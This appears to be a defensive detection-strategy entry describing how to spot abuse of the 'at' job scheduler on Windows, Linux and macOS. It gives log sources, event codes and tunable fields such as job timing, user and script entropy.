Detects creation of scheduled tasks via at.exe or WMI Win32_ScheduledJob class, followed by execution of anomalous processes by svchost.exe or taskeng.exe.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | WinEventLog:Security | EventCode=4698 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| TaskUser | Unusual users creating jobs (e.g., non-admin accounts or service users). |
| ExecutionTimeWindow | Delay between task registration and execution. |
| CommandLinePattern | Unexpected script or binary execution (e.g., cmd.exe /c PowerShell payload). |
Detects usage of at command to schedule jobs, followed by job execution and modification of job files under /var/spool/cron/atjobs.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| File Modification (DC0061) | auditd:SYSCALL | write |
| Field | Description |
|---|---|
| AtJobPath | Monitoring additional paths (e.g., tmp-mounted spool dirs) for modified at jobs. |
| ScheduleLatency | Expected delay between at job creation and execution. |
| JobScriptEntropy | High entropy or obfuscation in at job payloads. |
Detects user or root invocation of at command to schedule a job, followed by job execution using LaunchServices and activity in /usr/lib/cron/at.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | process: at, job runner |
| File Modification (DC0061) | fs:fsusage | file access to /usr/lib/cron/at and job execution path |
| Process Creation (DC0032) | macos:osquery | process_events |
| Field | Description |
|---|---|
| AtPermissions | Whether `at.allow` and `at.deny` are properly configured. |
| ExecutionCommand | Target binary executed via the at job. |
| RunUser | Detection of root user scheduling job with unusual command. |